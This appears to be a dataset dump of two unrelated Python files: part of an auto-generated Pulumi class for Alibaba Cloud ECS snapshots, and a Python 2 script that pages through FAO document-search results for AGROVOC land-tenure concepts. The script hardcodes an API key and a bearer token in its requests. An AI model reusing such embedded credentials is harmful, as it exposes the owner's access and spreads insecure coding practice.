pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""")
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if retention_days is not None:
pulumi.set(__self__, "retention_days", retention_days)
if snapshot_name is not None:
pulumi.set(__self__, "snapshot_name", snapshot_name)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
        Description of the snapshot. This description can have a string of 2 to 256 characters. It cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> Optional[pulumi.Input[str]]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@disk_id.setter
def disk_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_id", value)
@property
@pulumi.getter
def force(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "force")
@force.setter
def force(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force", value)
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "instant_access")
@instant_access.setter
def instant_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "instant_access", value)
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "instant_access_retention_days")
@instant_access_retention_days.setter
def instant_access_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_access_retention_days", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retention_days")
@retention_days.setter
def retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retention_days", value)
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_name")
@snapshot_name.setter
def snapshot_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
class Snapshot(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
## Import
Snapshot can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ecs/snapshot:Snapshot snapshot s-abc1234567890000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters. It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SnapshotArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Snapshot can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ecs/snapshot:Snapshot snapshot s-abc1234567890000
```
:param str resource_name: The name of the resource.
:param SnapshotArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SnapshotArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SnapshotArgs.__new__(SnapshotArgs)
__props__.__dict__["category"] = category
__props__.__dict__["description"] = description
if disk_id is None and not opts.urn:
raise TypeError("Missing required property 'disk_id'")
__props__.__dict__["disk_id"] = disk_id
__props__.__dict__["force"] = force
__props__.__dict__["instant_access"] = instant_access
__props__.__dict__["instant_access_retention_days"] = instant_access_retention_days
if name is not None and not opts.urn:
                warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. Use the new field 'snapshot_name' instead.""", DeprecationWarning)
                pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. Use the new field 'snapshot_name' instead.""")
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["retention_days"] = retention_days
__props__.__dict__["snapshot_name"] = snapshot_name
__props__.__dict__["tags"] = tags
__props__.__dict__["status"] = None
super(Snapshot, __self__).__init__(
'alicloud:ecs/snapshot:Snapshot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Snapshot':
"""
Get an existing Snapshot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Description of the snapshot. The description can be 2 to 256 characters in length and cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SnapshotState.__new__(_SnapshotState)
__props__.__dict__["category"] = category
__props__.__dict__["description"] = description
__props__.__dict__["disk_id"] = disk_id
__props__.__dict__["force"] = force
__props__.__dict__["instant_access"] = instant_access
__props__.__dict__["instant_access_retention_days"] = instant_access_retention_days
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["retention_days"] = retention_days
__props__.__dict__["snapshot_name"] = snapshot_name
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
return Snapshot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def category(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "category")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
        Description of the snapshot. The description can be 2 to 256 characters in length and cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> pulumi.Output[str]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@property
@pulumi.getter
def force(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "force")
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "instant_access")
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "instant_access_retention_days")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "retention_days")
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> pulumi.Output[str]:
return pulumi.get(self, "snapshot_name")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 45.113752 | 275 | 0.645717 | 3,242 | 26,572 | 5.077113 | 0.060457 | 0.084872 | 0.115431 | 0.073512 | 0.897631 | 0.882139 | 0.865067 | 0.856804 | 0.83949 | 0.816403 | 0 | 0.005632 | 0.244919 | 26,572 | 588 | 276 | 45.190476 | 0.814743 | 0.233027 | 0 | 0.828784 | 1 | 0.014888 | 0.118739 | 0.018861 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16129 | false | 0.002481 | 0.012407 | 0.049628 | 0.270471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1cc3796e6fc2eeaf602badbb245d1a2c248859fc | 27,398 | py | Python | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | null | null | null | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | 4 | 2016-11-23T16:12:54.000Z | 2021-06-07T11:47:36.000Z | landlibrary/importers/FAOdocrep/faodocuments-2017/faodocrep-retrieve.py | landportal/data | 465c4ff4ec71bbb55bf74643561fb8284b46211b | [
"MIT"
] | 1 | 2017-02-02T12:46:20.000Z | 2017-02-02T12:46:20.000Z | import requests
import json
from fileinput import filename
def retrieve():
endpoint = "https://api.fao.org/api/gsa/1.0.0"
#TODO extract to a variable
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
stats={}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
print agrovoc_label
next=0
all_results = []
year_start=1850
year_end=2016
agrovoc_uri_enconded = "http%3A%252F%252Faims%252Efao%252Eorg%252Faos%252Fagrovoc%252F" + str.replace(agrovoc_uri,"http://aims.fao.org/aos/agrovoc/","")
        # workaround: the GSA API needs the AGROVOC URI double percent-encoded; see the encode_agrovoc_uri() sketch below
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+ agrovoc_uri_enconded +").docRepCollection%3Adocuments&filter=0&q=+inmeta%3Ayear%3A"+str(year_start)+".."+str(year_end)+"&proxystylesheet=xml_to_json&getfields=*&dnavs=&start=0&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
while (next_relative_url):
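            # Descriptive comment (added): results are paged 10 at a time;
            # the presence of GSP.RES.NB.NU in a response signals another
            # page, so the loop keeps rebuilding next_relative_url with an
            # advanced start offset until no continuation marker remains.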
response = requests.get(endpoint+next_relative_url, headers={"Accept":"application/json","Authorization" : "Bearer 8ce6f29360faa9ee4fcf29b749d455e"})
data = response.json()
stats[agrovoc_label] = 0
if 'current_page' in data['pagination']:
current_page = data['pagination']['current_page']
else: #no results for that concept
next_relative_url = None
continue
stats[agrovoc_label] = data['GSP']['RES']['M']
next+=10
            if ('NB' in data['GSP']['RES'] and 'NU' in data['GSP']['RES']['NB']):
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+agrovoc_uri_enconded+").docRepCollection%3Adocuments&filter=0&q=+inmeta%3Ayear%3A"+str(year_start)+".."+str(year_end)+"&proxystylesheet=xml_to_json&getfields=*&dnavs=&start="+str(next)+"&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
else:
next_relative_url = None
#save the results in a file
filename="results-"+agrovoc_label+"-"+current_page+".json"
with open(filename, 'w') as outfile:
json.dump(data, outfile)
print("written file="+filename)
#concat the results
            partial_results = data['GSP']['RES']['results']
            all_results = all_results + partial_results
with open("all-results+"+agrovoc_label+".json", 'w') as outfile:
json.dump(all_results, outfile)
print("written file ALL -"+agrovoc_label+"- results")
print stats
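# Hedged refactoring sketch (editor's addition): the double percent-encoding
# that retrieve() and retrieve_stats() build by hand can be derived from the
# raw AGROVOC URI with a small helper. The GSA endpoint appears to expect '/'
# and '.' encoded twice (%252F, %252E) but ':' only once (%3A), so a plain
# urllib.quote() pass cannot reproduce it; this helper simply mirrors the
# literal prefix used above. The function name is ours, not part of any API.
def encode_agrovoc_uri(agrovoc_uri):
    # Strip the shared namespace and re-attach its hand-encoded form.
    concept = str.replace(agrovoc_uri, "http://aims.fao.org/aos/agrovoc/", "")
    return "http%3A%252F%252Faims%252Efao%252Eorg%252Faos%252Fagrovoc%252F" + concept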
def retrieve_stats():
endpoint = "https://api.fao.org/api/gsa/1.0.0"
retrieve_list = {
"common lands" : "http://aims.fao.org/aos/agrovoc/c_1782",
"deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
"desertification" : "http://aims.fao.org/aos/agrovoc/c_2204",
"dryland management" : "http://aims.fao.org/aos/agrovoc/c_9000036",
"farmland" : "http://aims.fao.org/aos/agrovoc/c_2808",
"forest conservation" : "http://aims.fao.org/aos/agrovoc/c_1374158672853",
"forest degradation" : "http://aims.fao.org/aos/agrovoc/c_331593",
"forest grazing" : "http://aims.fao.org/aos/agrovoc/c_3046",
"forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
"forest land use" : "http://aims.fao.org/aos/agrovoc/c_1374157828575",
"forest resources" : "http://aims.fao.org/aos/agrovoc/c_3050",
"geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
"grassland management" : "http://aims.fao.org/aos/agrovoc/c_3364",
"housing" : "http://aims.fao.org/aos/agrovoc/c_3678",
"indigenous tenure systems" : "http://aims.fao.org/aos/agrovoc/c_9000081",
"individual land property" : "http://aims.fao.org/aos/agrovoc/c_9000082",
"land" : "http://aims.fao.org/aos/agrovoc/c_4172",
"land access" : "http://aims.fao.org/aos/agrovoc/c_9000090",
"land administration" : "http://aims.fao.org/aos/agrovoc/c_9000091",
"land classification" : "http://aims.fao.org/aos/agrovoc/c_15991",
"land cover" : "http://aims.fao.org/aos/agrovoc/c_37897",
"land cover mapping" : "http://aims.fao.org/aos/agrovoc/c_9000094",
"land degradation" : "http://aims.fao.org/aos/agrovoc/c_34823",
"land improvement" : "http://aims.fao.org/aos/agrovoc/c_28717",
"land management" : "http://aims.fao.org/aos/agrovoc/c_24866",
"land markets" : "http://aims.fao.org/aos/agrovoc/c_4175",
"land ownership" : "http://aims.fao.org/aos/agrovoc/c_28718",
"land policies" : "http://aims.fao.org/aos/agrovoc/c_195",
"land productivity" : "http://aims.fao.org/aos/agrovoc/c_4176",
"land reform" : "http://aims.fao.org/aos/agrovoc/c_4178",
"land registration" : "http://aims.fao.org/aos/agrovoc/c_9000098",
"land resources" : "http://aims.fao.org/aos/agrovoc/c_4179",
"land rights" : "http://aims.fao.org/aos/agrovoc/c_37898",
"land suitability" : "http://aims.fao.org/aos/agrovoc/c_15992",
"land tax" : "http://aims.fao.org/aos/agrovoc/c_4180",
"land tenure" : "http://aims.fao.org/aos/agrovoc/c_12069",
"land transfers" : "http://aims.fao.org/aos/agrovoc/c_4181",
"land use" : "http://aims.fao.org/aos/agrovoc/c_4182",
"land use mapping" : "http://aims.fao.org/aos/agrovoc/c_9000100",
"land use planning" : "http://aims.fao.org/aos/agrovoc/c_37899",
"landowners" : "http://aims.fao.org/aos/agrovoc/c_4184",
"multiple land use" : "http://aims.fao.org/aos/agrovoc/c_28734",
"natural resources" : "http://aims.fao.org/aos/agrovoc/c_5091",
"natural resources management" : "http://aims.fao.org/aos/agrovoc/c_9000115",
"pastoral society" : "http://aims.fao.org/aos/agrovoc/c_28741",
"pastoralism" : "http://aims.fao.org/aos/agrovoc/c_16144",
"private ownership" : "http://aims.fao.org/aos/agrovoc/c_6192",
"property rights" : "http://aims.fao.org/aos/agrovoc/c_37942",
"public ownership" : "http://aims.fao.org/aos/agrovoc/c_6350",
"rangelands" : "http://aims.fao.org/aos/agrovoc/c_6448",
"reforestation" : "http://aims.fao.org/aos/agrovoc/c_13802",
"resource management" : "http://aims.fao.org/aos/agrovoc/c_6524",
"right of access" : "http://aims.fao.org/aos/agrovoc/c_6604",
"soil degradation" : "http://aims.fao.org/aos/agrovoc/c_7168",
"soil management" : "http://aims.fao.org/aos/agrovoc/c_7176",
"spatial database" : "http://aims.fao.org/aos/agrovoc/c_9000154",
"sustainable forest management" : "http://aims.fao.org/aos/agrovoc/c_331342",
"sustainable land management" : "http://aims.fao.org/aos/agrovoc/c_36580",
"tenure" : "http://aims.fao.org/aos/agrovoc/c_7669",
"urban agriculture" : "http://aims.fao.org/aos/agrovoc/c_35707",
"urban areas" : "http://aims.fao.org/aos/agrovoc/c_8085",
"urban planning" : "http://aims.fao.org/aos/agrovoc/c_37948",
"urbanization" : "http://aims.fao.org/aos/agrovoc/c_8088",
"valuation" : "http://aims.fao.org/aos/agrovoc/c_8152",
"water management" : "http://aims.fao.org/aos/agrovoc/c_8320",
"water resources" : "http://aims.fao.org/aos/agrovoc/c_8325",
"water rights" : "http://aims.fao.org/aos/agrovoc/c_16062",
}
stats={}
for agrovoc_label, agrovoc_uri in retrieve_list.iteritems():
agrovoc_uri_enconded = "http%3A%252F%252Faims%252Efao%252Eorg%252Faos%252Fagrovoc%252F" + str.replace(agrovoc_uri,"http://aims.fao.org/aos/agrovoc/","")
        # workaround: the GSA API needs the AGROVOC URI double percent-encoded; see the encode_agrovoc_uri() sketch above
next_relative_url = "/search?client=docrep&output=xml_no_dtd&site=faodocrep&partialfields=&requiredfields=(agrovoc_id%3A"+ agrovoc_uri_enconded +").docRepCollection%3Adocuments&filter=0&q=&proxystylesheet=xml_to_json&getfields=*&dnavs=&start=0&apikey=c335a12f-a850-4816-aed5-51ab7f723f12&ulang=en&language=en&sort=meta%3Ayear%3AD%3ASD%3AY"
response = requests.get(endpoint+next_relative_url, headers={"Accept":"application/json","Authorization" : "Bearer 8ce6f29360faa9ee4fcf29b749d455e"})
data = response.json()
stats[agrovoc_label] = 0
if 'current_page' in data['pagination']:
current_page = data['pagination']['current_page']
else: #no results for that concept
next_relative_url = None
continue
stats[agrovoc_label] = data['GSP']['RES']['M']
print agrovoc_label + ";" + str(data['GSP']['RES']['M'])
print stats
#retrieve_stats()
#for k,v in {'land use planning': u'53', 'natural resources management': u'343', 'land productivity': u'22', 'right of access': u'81', 'land classification': u'39', 'forest land use': u'75', 'pastoral society': u'14', 'land administration': u'51', 'geographical information systems': u'46', 'land registration': u'29', 'forest degradation': u'63', 'land cover mapping': u'20', 'land resources': u'106', 'forest conservation': u'60', 'dryland management': u'44', 'urbanization': u'49', 'farmland': u'25', 'land suitability': u'22', 'water resources': u'269', 'land cover': u'20', 'desertification': u'69', 'individual land property': u'90', 'sustainable forest management': u'552', 'landowners': u'31', 'land tax': u'25', 'urban planning': u'17', 'forest grazing': u'27', 'forest resources': u'763', 'reforestation': u'147', 'land transfers': u'28', 'pastoralism': u'32', 'land degradation': u'68', 'sustainable land management': u'85', 'spatial database': u'11', 'private ownership': u'39', 'land rights': u'128', 'resource management': u'568', 'soil management': u'316', 'deforestation': u'207', 'land improvement': u'18', 'property rights': u'95', 'rangelands': u'80', 'forest land': u'240', 'land tenure': u'403', 'valuation': u'16', 'urban areas': u'92', 'multiple land use': u'20', 'land access': u'100', 'land policies': u'117', 'land': u'57', 'public ownership': u'34', 'natural resources': u'277', 'common lands': u'30', 'water management': u'314', 'housing': u'67', 'land use': u'383', 'soil degradation': u'99', 'water rights': u'33', 'land management': u'136', 'land markets': u'35', 'indigenous tenure systems': u'86', 'tenure': u'465', 'grassland management': u'54', 'land reform': u'117', 'land use mapping': u'28', 'urban agriculture': u'32', 'land ownership': u'212'}.iteritems():
# print k +";"+ str(v)
# initial_retrieve_list = {
# "agropastoral systems" : "http://aims.fao.org/aos/agrovoc/c_16112",
# "alienation (land)" : "http://aims.fao.org/aos/agrovoc/c_ceb73ce1",
# "cadastral administration" : "http://aims.fao.org/aos/agrovoc/c_d774aa00",
# "cadastral register" : "http://aims.fao.org/aos/agrovoc/c_b4d51db0",
# "cadastres" : "http://aims.fao.org/aos/agrovoc/c_1177",
# "capital value (land)" : "http://aims.fao.org/aos/agrovoc/c_a9966ac9",
# "co-ownership rights" : "http://aims.fao.org/aos/agrovoc/c_599d2e5c",
# "commons" : "http://aims.fao.org/aos/agrovoc/c_778a14cf",
# "common property" : "http://aims.fao.org/aos/agrovoc/c_9000022",
# "community forestry" : "http://aims.fao.org/aos/agrovoc/c_16532",
# "customary land rights" : "http://aims.fao.org/aos/agrovoc/c_cd44c0b3",
# "customary tenure" : "http://aims.fao.org/aos/agrovoc/c_56c34d4d",
# "deforestation" : "http://aims.fao.org/aos/agrovoc/c_15590",
# "extensive land use" : "http://aims.fao.org/aos/agrovoc/c_36552",
# "forest land" : "http://aims.fao.org/aos/agrovoc/c_24843",
# "geographical information systems" : "http://aims.fao.org/aos/agrovoc/c_35131",
# "grazing land rights" : "http://aims.fao.org/aos/agrovoc/c_97241aeb",
# "grazing lands" : "http://aims.fao.org/aos/agrovoc/c_3369",
# "indigenous tenure" : "http://aims.fao.org/aos/agrovoc/c_a291ae58",
# "indigenous land rights" : "http://aims.fao.org/aos/agrovoc/c_d42b49e7",
# "indigenous lands" : "http://aims.fao.org/aos/agrovoc/c_86524ff8",
# "intensive land use" : "http://aims.fao.org/aos/agrovoc/c_36551",
# "grazing land rights" : "http://aims.fao.org/aos/agrovoc/c_97241aeb",
